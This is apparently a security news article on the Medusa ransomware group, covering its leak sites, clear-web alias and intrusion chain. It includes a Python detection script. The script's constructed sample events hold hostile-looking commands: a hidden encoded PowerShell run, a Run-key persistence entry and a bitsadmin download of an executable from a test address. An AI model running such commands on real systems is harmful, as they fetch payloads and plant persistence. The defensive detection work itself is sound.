Medusa Ransomware Exploits Fortinet Flaw in Devastating Cyber Attacks

Medusa is a prominent ransomware group that operates on both the surface web and the dark web, where it regularly posts information about its victims. Its visible online presence and rapid rate of attacks have drawn attention, and its operational practices warrant closer examination.

Medusa ransomware is a distinct malware family and should not be confused with MedusaLocker or the Medusa Android malware; each is a separate threat with its own encryption and extortion methods, and each poses its own risk.

Operating as a ransomware-as-a-service (RaaS) group, Medusa increased its attack frequency in 2024, hitting a wide range of sectors and countries. Its profit-sharing model rewards affiliates for bringing in victims, which accounts for much of the rise.

Different Sites 

Medusa operates a data-leak blog on the dark web, reachable over Tor, where it posts about recent intrusions, including the data it has stolen and leaked. Victims are given a limited time to pay a ransom in Bitcoin in exchange for the stolen data being deleted rather than published.

Like most ransomware groups, Medusa maintains a dark web presence for its operations, but unusually it also has a clear web alias, "OSINT Without Borders", with a public website and social media profiles. Shared branding, including the same logo, suggests these are facades for the same entity.

OSINT Without Borders, a blog suspected of being run by Medusa, is a concern because it amplifies the group's leaks and could serve as an intelligence-gathering channel for future attacks.

osintcopr.net Banner, Disclaimer, and Telegram Link

The alias is also tied to several social media accounts, including an X account and a Facebook page, under the names Robert Vroofdown and Robert Enaber. Maintaining accounts like these is unusual for a ransomware group.

Medusa also uses Telegram for information sharing and maintains an active channel holding over 700 files, while the X link on its site merely redirects to search results.

Researchers at Dark Atlas used a leaked configuration file to compromise the authentication of Medusa's cloud account, exposing victim data the group was holding and disrupting its operations.

Medusa gains initial access by exploiting publicly known vulnerabilities in exposed systems, then deploys its ransomware payload, often evading detection with the techniques described in the next section.

The ransomware attack 

Medusa exploits a SQL injection vulnerability in Fortinet's FortiClient EMS to gain initial access, establishes persistence with remote monitoring and management (RMM) tools and registry modifications, and runs PowerShell commands to keep control of the compromised system.

From the compromised server it harvests credentials and moves laterally to other hosts using bitsadmin or PsExec. It then runs gaze.exe to stop services, uses Tor links for data exfiltration and contact, and encrypts files using RSA encryption.

Medusa ransom note excerpt

It also abuses vulnerable signed drivers (the bring-your-own-vulnerable-driver, or BYOVD, technique) to locate and terminate anti-malware processes, bypassing endpoint protection. The ransom note tells victims that they have been breached and explains how to contact the group to recover their data and prevent its publication.
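As an added example (not code from the article, from Bitdefender or from the Medusa operators), the following Python detector turns the chain just described into rules and runs them over constructed Sysmon-style events flattened to key=value lines. The sqlservr.exe-spawns-cmd.exe rule is a generic heuristic for SQL injection that reaches command execution and is not something the article states about Fortinet EMS; the host names, paths, the killer.sys driver name and the 198.51.100.7 address (an RFC 5737 test address) are invented sample data. The last function scores hosts by how many distinct stages fired on them, which is how a single weak signal such as a file named gaze.exe becomes useful.

```python
"""Added example (not Cyber Press, Bitdefender or Medusa code): flag the intrusion stages the
article describes in Sysmon-style events flattened to key=value lines. Sample events, hosts,
paths, the driver name and the 198.51.100.7 address are all constructed for this demo."""
import re
from collections import defaultdict
from dataclasses import dataclass

SAMPLE_EVENTS = [  # constructed telemetry, not real logs; values containing spaces are quoted
    r'EventID=1 Host=EMS01 ParentImage="C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    r'EventID=1 Host=EMS01 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    r'EventID=1 Host=EMS01 ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Image=C:\Windows\System32\reg.exe CommandLine="reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\ProgramData\svc.exe /f"',
    r'EventID=1 Host=EMS01 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\bitsadmin.exe CommandLine="bitsadmin /transfer job1 /download /priority high http://198.51.100.7/a.exe C:\ProgramData\a.exe"',
    r'EventID=1 Host=FS02 ParentImage=C:\Windows\System32\services.exe Image=C:\Windows\PSEXESVC.exe CommandLine=C:\Windows\PSEXESVC.exe',
    r'EventID=1 Host=FS02 ParentImage=C:\Windows\PSEXESVC.exe Image=C:\ProgramData\gaze.exe CommandLine="gaze.exe"',
    r'EventID=6 Host=FS02 ImageLoaded=C:\ProgramData\drv\killer.sys Signed=true Signature="Example Hardware Co"',
    r'EventID=1 Host=WS07 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe',
    r'EventID=6 Host=WS07 ImageLoaded=C:\Windows\System32\drivers\tcpip.sys Signed=true Signature="Microsoft Windows"',
]
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
DB_ENGINES = {"sqlservr.exe", "mysqld.exe", "postgres.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    host: str
    rule: str
    evidence: str

def parse_event(line):
    """One key=value line -> dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}

def _base(path):
    """Lower-cased file name of a Windows path ('' if the field is missing)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def db_spawns_shell(ev):
    # Generic SQL-injection-to-command-execution signal: a DB engine has no business parenting a shell.
    return (ev.get("EventID") == "1" and _base(ev.get("ParentImage", "")) in DB_ENGINES
            and _base(ev.get("Image", "")) in SHELLS)

def encoded_powershell(ev):
    cl = " " + ev.get("CommandLine", "").lower() + " "
    return (_base(ev.get("Image", "")) in {"powershell.exe", "pwsh.exe"}
            and (re.search(r"\s-e(c|nc|ncodedcommand)?\s", cl) is not None
                 or re.search(r"\s-w(indowstyle)?\s+hidden\s", cl) is not None))

def run_key_persistence(ev):
    target = (ev.get("CommandLine", "") + " " + ev.get("TargetObject", "")).lower()
    return "\\currentversion\\run" in target and (
        ev.get("EventID") == "13" or _base(ev.get("Image", "")) in SHELLS | {"reg.exe"})

def bitsadmin_transfer(ev):
    return (_base(ev.get("Image", "")) == "bitsadmin.exe"
            and "/transfer" in ev.get("CommandLine", "").lower())

def psexec_service(ev):
    # PSEXESVC.exe is the service PsExec drops on the target; its children are the remote commands.
    return "psexesvc.exe" in {_base(ev.get("Image", "")), _base(ev.get("ParentImage", ""))}

def service_kill(ev):
    # gaze.exe is the name the article reports; names are trivially changed, so also catch bulk stops.
    cl = ev.get("CommandLine", "").lower()
    return (_base(ev.get("Image", "")) == "gaze.exe"
            or re.search(r"\b(net\s+stop|sc\s+stop|taskkill\s+/f)\b", cl) is not None)

def driver_from_user_path(ev):
    # BYOVD heuristic: real drivers load from \Windows\System32\drivers, not from user-writable dirs.
    return ev.get("EventID") == "6" and any(p in ev.get("ImageLoaded", "").lower() for p in USER_WRITABLE)

RULES = [db_spawns_shell, encoded_powershell, run_key_persistence, bitsadmin_transfer,
         psexec_service, service_kill, driver_from_user_path]

def scan(lines):
    """Run every rule over every event; one Finding per (event, rule) hit."""
    findings = []
    for ev in map(parse_event, lines):
        for rule in RULES:
            if rule(ev):
                findings.append(Finding(ev.get("Host", "?"), rule.__name__,
                                        ev.get("CommandLine") or ev.get("ImageLoaded", "")))
    return findings

def hosts_with_chain(findings, min_stages=3):
    """Hosts where several distinct stages fired: one hit is noise, a chain is the intrusion."""
    stages = defaultdict(set)
    for f in findings:
        stages[f.host].add(f.rule)
    return sorted(h for h, s in stages.items() if len(s) >= min_stages)

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host:6} {f.rule:22} {f.evidence}")
    print("multi-stage hosts:", hosts_with_chain(hits))
```

On the sample data the EMS server trips four stages (database-spawned shell, hidden encoded PowerShell, Run-key persistence, bitsadmin download) and the file server three (PsExec service, the service-killing tool launched by it, a driver loaded from ProgramData), while the benign workstation produces nothing. In a real SIEM the parser would be replaced by the native event schema and the thresholds tuned, but the shape of the logic, per-stage rules plus per-host chaining, is what turns the TTPs above into an alert.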

According to Bitdefender, the group has evolved its communication methods and capabilities, making its attacks harder to track and respond to and posing a significant challenge for defenders.

Organizations can enhance their security posture by implementing a multi-layered approach, including prevention, protection, detection, and response measures. 

Kaaviya is a Security Editor and reporter with Cyber Press, covering cyber security incidents.
